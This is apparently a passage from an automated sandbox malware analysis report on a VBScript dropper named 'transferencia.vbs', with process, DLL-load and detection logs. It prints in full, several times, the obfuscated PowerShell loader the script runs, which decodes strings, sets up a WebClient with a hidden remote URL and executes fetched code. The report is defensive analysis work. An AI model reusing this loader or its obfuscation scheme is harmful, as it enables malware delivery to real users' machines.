aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=Jump to behavior
      Source: transferencia.vbsInitial sample: Strings found which are bigger than 50
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6062
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6062Jump to behavior
      Source: classification engineClassification label: mal88.expl.evad.winVBS@4/3@0/1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Dorgens.UnsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5248:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xlpl1eip.t5n.ps1Jump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia.vbs"
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: transferencia.vbsVirustotal: Detection: 14%
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=Jump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: powershell.exe, 00000002.00000002.3349546170.000001BF32E94000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2053986258.0000021294821000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2045877123.0000021294621000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000002.00000002.3349546170.000001BF32E94000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000002.00000002.3349546170.000001BF32E29000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdblz[ source: powershell.exe, 00000002.00000002.3350719704.000001BF33118000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      VBScript performs obfuscated calls to suspicious functions
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Prerem", "Unsupported parameter type 00000000")
      Suspicious powershell command line found
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848DB7969 push ebx; retf 2_2_00007FF848DB796A
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848DB00BD pushad ; iretd 2_2_00007FF848DB00C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848E879C9 push ebx; ret 2_2_00007FF848E879CA
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
